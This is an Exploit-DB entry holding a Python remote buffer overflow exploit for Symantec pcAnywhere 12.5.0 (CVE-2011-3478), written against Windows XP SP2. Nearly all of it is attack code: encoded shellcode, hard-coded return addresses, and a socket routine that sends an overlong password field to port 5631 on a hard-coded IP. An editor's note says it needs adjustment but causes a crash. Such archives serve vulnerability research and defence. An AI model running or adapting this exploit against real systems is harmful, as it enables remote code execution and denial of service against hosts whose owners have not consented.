Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow

EDB-ID:

19407

Author:

S2 Crew

Type:

remote

Platform:

Windows

Published:

2012-06-27

#!/usr/bin/python

# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
# Date: 2012.06.27
# Author: S2 Crew [Hungary]
# Software Link: symantec.com
# Version: 12.5.0
# Tested on: Windows XP SP2
# CVE: CVE-2011-3478 
 
#EDB Note: Needs adjustment but there is a crash

# Code :
import socket
import time
import struct
import string
import sys

shell = (
"\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9"
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8"
"\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d"
"\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9"
"\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48"
"\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf\x63\xc2"
"\x0d\xd7\x06\x15\xf9\x6d\x08\x46\x51\xf9\x42\x7e\xda\xa5"
"\x72\x7f\x0f\xb6\x4f\x36\x24\x0d\x3b\xc9\xec\x5f\xc4\xfb"
"\xd0\x0c\xfb\x33\xdd\x4d\x3b\xf3\x3d\x38\x37\x07\xc0\x3b"
"\x8c\x75\x1e\xc9\x11\xdd\xd5\x69\xf2\xdf\x3a\xef\x71\xd3"
"\xf7\x7b\xdd\xf0\x06\xaf\x55\x0c\x83\x4e\xba\x84\xd7\x74"
"\x1e\xcc\x8c\x15\x07\xa8\x63\x29\x57\x14\xdc\x8f\x13\xb7"
"\x09\xa9\x79\xd0\xfe\x84\x81\x20\x68\x9e\xf2\x12\x37\x34"
"\x9d\x1e\xb0\x92\x5a\x60\xeb\x63\xf4\x9f\x13\x94\xdc\x5b"
"\x47\xc4\x76\x4d\xe7\x8f\x86\x72\x32\x1f\xd7\xdc\xec\xe0"
"\x87\x9c\x5c\x89\xcd\x12\x83\xa9\xed\xf8\xb2\xed\x23\xd8"
"\x97\x99\x41\xde\x06\x06\xcf\x38\x42\xa6\x99\x93\xfa\x04"
"\xfe\x2b\x9d\x77\xd4\x07\x36\xe0\x60\x4e\x80\x0f\x71\x44"
"\xa3\xbc\xd9\x0f\x37\xaf\xdd\x2e\x48\xfa\x75\x38\x71\x6d"
"\x0f\x54\x30\x0f\x10\x7d\xa2\xac\x83\x1a\x32\xba\xbf\xb4"
"\x65\xeb\x0e\xcd\xe3\x01\x28\x67\x11\xd8\xac\x40\x91\x07"
"\x0d\x4e\x18\xc5\x29\x74\x0a\x13\xb1\x30\x7e\xcb\xe4\xee"
"\x28\xad\x5e\x41\x82\x67\x0c\x0b\x42\xf1\x7e\x8c\x14\xfe"
"\xaa\x7a\xf8\x4f\x03\x3b\x07\x7f\xc3\xcb\x70\x9d\x73\x33"
"\xab\x25\x83\x7e\xf1\x0c\x0c\x27\x60\x0d\x51\xd8\x5f\x52"
"\x6c\x5b\x55\x2b\x8b\x43\x1c\x2e\xd7\xc3\xcd\x42\x48\xa6"
"\xf1\xf1\x69\xe3"
)
init1 = (
"\x00\x00\x00\x00" # kezdeti handshake
)

init2 = (
"\x0d\x06\xfe" # Enter username uzenet koveti (NTdialog)
)

init3 = (
"A" * 100 #+ "\r" #username
)

readable_xp_sp2 = struct.pack('<L',0x023E5AD0)
call_esi = struct.pack('<L',0x67f7aac4)
jmp = struct.pack('<L',0x414112EB)

init4 = (
"B" * 1282 + jmp + readable_xp_sp2 + "DDDD" +call_esi + "AAAA" + shell + "E" * (4000 - 1286 - 12 - len(shell))
)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('172.16.29.133',5631)) # hardcoded IP address

print "init packet..."
s.send(init1) # send the data
time.sleep(5)
data = s.recv(1024)

print "handshake packet..."
s.send(init2) # send the data
time.sleep(5)
data = s.recv(1024)

print "username packet..."
s.send(init3) # send the data
time.sleep(5)
#data = s.recv(1024)

print "password packet..."
s.send(init4) # send the data
s.close()